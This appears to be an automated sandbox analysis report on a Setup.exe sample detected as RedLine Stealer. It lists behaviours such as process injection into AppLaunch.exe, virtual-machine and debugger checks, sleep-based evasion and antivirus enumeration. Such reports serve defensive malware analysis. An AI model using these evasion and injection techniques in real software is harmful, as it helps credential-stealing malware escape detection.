                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00407163 push ecx; ret 0_2_00407176
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040D1D9 push ecx; ret 0_2_0040D1EC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0574D040 push esp; iretd 2_2_0574D041
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0CFF88 pushad ; ret 2_2_0F0CFF89
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0CFF8A push esp; ret 2_2_0F0CFF91
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0C5B60 push gs; iretd 2_2_0F0C5BDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0C5BD9 push gs; iretd 2_2_0F0C5BDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0C1AD2 push eax; ret 2_2_0F0C1AD3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0CD198 push esp; iretd 2_2_0F0CD1B1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0F0E2AB9 push cs; ret 2_2_0F0E2AE4
                    Source: Setup.exeStatic PE information: section name: .ueXxN
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00414203 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00414203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5340Thread sleep count: 5986 > 30Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 6904Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 3076Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe TID: 5340Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-15917
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWindow / User API: threadDelayed 5986Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 2_2_0574D7A0 sldt word ptr [eax]2_2_0574D7A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeAPI call chain: ExitProcess graph end nodegraph_0-15731
                    Source: AppLaunch.exe, 00000002.00000003.406231569.000000000F469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: AppLaunch.exe, 00000002.00000003.406231569.000000000F469000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareEBYXSBAAWin32_VideoControllerU21KKRV8VideoController120060621000000.000000-00097365694display.infMSBDAKZ4AGMZ6PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsMS8FS_XZ
                    Source: AppLaunch.exe, 00000002.00000003.390825216.000000000F390000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.426014385.000000000F38E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004050D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004050D5
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00414203 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00414203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004050D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004050D5
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004070B5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_004070B5
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040DAC7 SetUnhandledExceptionFilter,0_2_0040DAC7
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00403B6F _abort,__NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00403B6F
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00408C35 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00408C35

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 515D008Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\Setup.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\Setup.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,0_2_00415045
                    Source: C:\Users\user\Desktop\Setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_004118EB
                    Source: C:\Users\user\Desktop\Setup.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_004100FC
                    Source: C:\Users\user\Desktop\Setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_004109C2
                    Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_004151C9
                    Source: C:\Users\user\Desktop\Setup.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_00415195
                    Source: C:\Users\user\Desktop\Setup.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_004119AC
                    Source: C:\Users\user\Desktop\Setup.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_00411A4F
                    Source: C:\Users\user\Desktop\Setup.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00411A13
                    Source: C:\Users\user\Desktop\Setup.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_00412224
                    Source: C:\Users\user\Desktop\Setup.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_00415308
                    Source: C:\Users\user\Desktop\Setup.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_0040A473
                    Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoA,0_2_0040ACEA
                    Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_004114F6
                    Source: C:\Users\user\Desktop\Setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_0041160D
                    Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_004116A5
                    Source: C:\Users\user\Desktop\Setup.exeCode function: GetLocaleInfoA,0_2_00411F40
                    Source: C:\Users\user\Desktop\Setup.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_0041076A
                    Source: C:\Users\user\Desktop\Setup.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_00411719
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040E85B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040E85B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: AppLaunch.exe, 00000002.00000002.426014385.000000000F3E5000.00000004.00000020.00020000.00000000.sdmp, AppLaunch.exe, 00000002.00000002.407569686.000000000560F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Yara detected RedLine Stealer
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.3.Setup.exe.560000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Setup.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000003.351025860.0000000000562000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
